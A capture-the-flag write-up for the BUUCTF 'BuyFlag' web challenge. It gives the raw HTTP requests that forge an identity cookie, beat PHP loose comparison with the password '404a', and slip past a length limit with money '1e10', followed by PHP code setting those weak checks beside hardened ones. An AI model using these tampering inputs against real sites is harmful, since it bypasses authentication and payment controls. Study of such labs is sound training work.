BUUCTF WEB [Geek Challenge 2019] BuyFlag

After entering the environment, the MENU contains a PAYFLAG function. Clicking it shows the following message:
FLAG FLAG NEED YOUR 100000000 MONEY ATTENTION If you want to buy the FLAG: You must be a student from CUIT!!! You must be answer the correct password!!! Only Cuit's students can buy the FLAG
This means three conditions must be met to buy the flag:
- be a student from CUIT
- be answer the correct password
- 100000000 MONEY

Capture the request with Burp:

```http
GET /pay.php HTTP/1.1
Host: a6d2f3b2-7815-46b3-9c23-6a9ac372709b.node4.buuoj.cn:81
Cache-Control: max-age=0
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/99.0.4844.74 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Cookie: user=0
Connection: close
```
The user value in the Cookie header presumably represents the user's identity. Condition 1 requires the identity to be a student from CUIT, so try changing 0 to 1:

```http
GET /pay.php HTTP/1.1
Host: a6d2f3b2-7815-46b3-9c23-6a9ac372709b.node4.buuoj.cn:81
Cache-Control: max-age=0
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/99.0.4844.74 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Cookie: user=1
Connection: close
```
Response:
you are Cuiter Please input your password!!

Press F12 to view the page source, which contains this comment:

```php
<!--
	~~~post money and password~~~
if (isset($_POST['password'])) {
	$password = $_POST['password'];
	if (is_numeric($password)) {
		echo "password can't be number</br>";
	}elseif ($password == 404) {
		echo "Password Right!</br>";
	}
}
-->
```
The comment asks us to send the password and money variables with the POST method. Because 404a is not a numeric string, it passes the is_numeric check, while the loose comparison with 404 still succeeds. Send the packet with Burp:

```http
POST /pay.php HTTP/1.1
Host: a6d2f3b2-7815-46b3-9c23-6a9ac372709b.node4.buuoj.cn:81
Content-Length: 29
Cache-Control: max-age=0
Upgrade-Insecure-Requests: 1
Origin: http://a6d2f3b2-7815-46b3-9c23-6a9ac372709b.node4.buuoj.cn:81
Content-Type: application/x-www-form-urlencoded
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/99.0.4844.74 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
Referer: http://a6d2f3b2-7815-46b3-9c23-6a9ac372709b.node4.buuoj.cn:81/pay.php
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Cookie: user=1
Connection: close

password=404a&money=100000000
```
Response:
you are Cuiter Password Right! Nember lenth is too long

The length of money is restricted, so try scientific notation:

```http
POST /pay.php HTTP/1.1
Host: a6d2f3b2-7815-46b3-9c23-6a9ac372709b.node4.buuoj.cn:81
Content-Length: 24
Cache-Control: max-age=0
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/99.0.4844.74 Safari/537.36
Origin: http://a6d2f3b2-7815-46b3-9c23-6a9ac372709b.node4.buuoj.cn:81
Content-Type: application/x-www-form-urlencoded
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
Referer: http://a6d2f3b2-7815-46b3-9c23-6a9ac372709b.node4.buuoj.cn:81/pay.php
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Cookie: user=1
Connection: close

password=404a&money=1e10
```
This returns the flag:
you are Cuiter Password Right! flag{ccffe99d-8849-4c0c-960f-d468bf5877bc}
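
The two input checks from this write-up next to a hardened form, as an added example that is not the challenge's own code. The password check is copied from the HTML comment above; the money check (a length limit of 8 followed by a numeric comparison) is an assumed shape inferred from the responses, and `PRICE` and the `strict_*` functions are hypothetical names.

```php
<?php
const PRICE = 100000000;

// Password check exactly as shown in the page's HTML comment.
function weak_password_ok($password): bool {
    if (is_numeric($password)) {
        return false;                 // "password can't be number"
    }
    // Loose comparison: before PHP 8, "404a" is cast to int 404 here.
    // PHP 8 compares an int with a non-numeric string as strings instead.
    return $password == 404;
}

// Assumed shape of the money check: length limit, then numeric comparison.
function weak_money_ok($money): bool {
    if (strlen($money) > 8) {
        return false;                 // "Nember lenth is too long"
    }
    return $money >= PRICE;           // "1e10" is a numeric string (float 1.0E+10)
}

// Hardened: exact, type-safe string match against the stored value.
function strict_password_ok($password, string $expected): bool {
    return is_string($password) && hash_equals($expected, $password);
}

// Hardened: accept decimal digits only, so exponent notation, hex,
// whitespace and arrays are rejected before any comparison happens.
function strict_money_ok($money): bool {
    if (!is_string($money) || !preg_match('/\A[0-9]{1,9}\z/', $money)) {
        return false;
    }
    return (int)$money >= PRICE;
}

// Constructed sample inputs, including the values used in the write-up.
foreach (['404', '404a'] as $p) {
    printf("password %-10s weak=%d strict=%d\n", $p,
        weak_password_ok($p), strict_password_ok($p, '404'));
}
foreach (['99999999', '100000000', '1e10'] as $m) {
    printf("money    %-10s weak=%d strict=%d\n", $m,
        weak_money_ok($m), strict_money_ok($m));
}
```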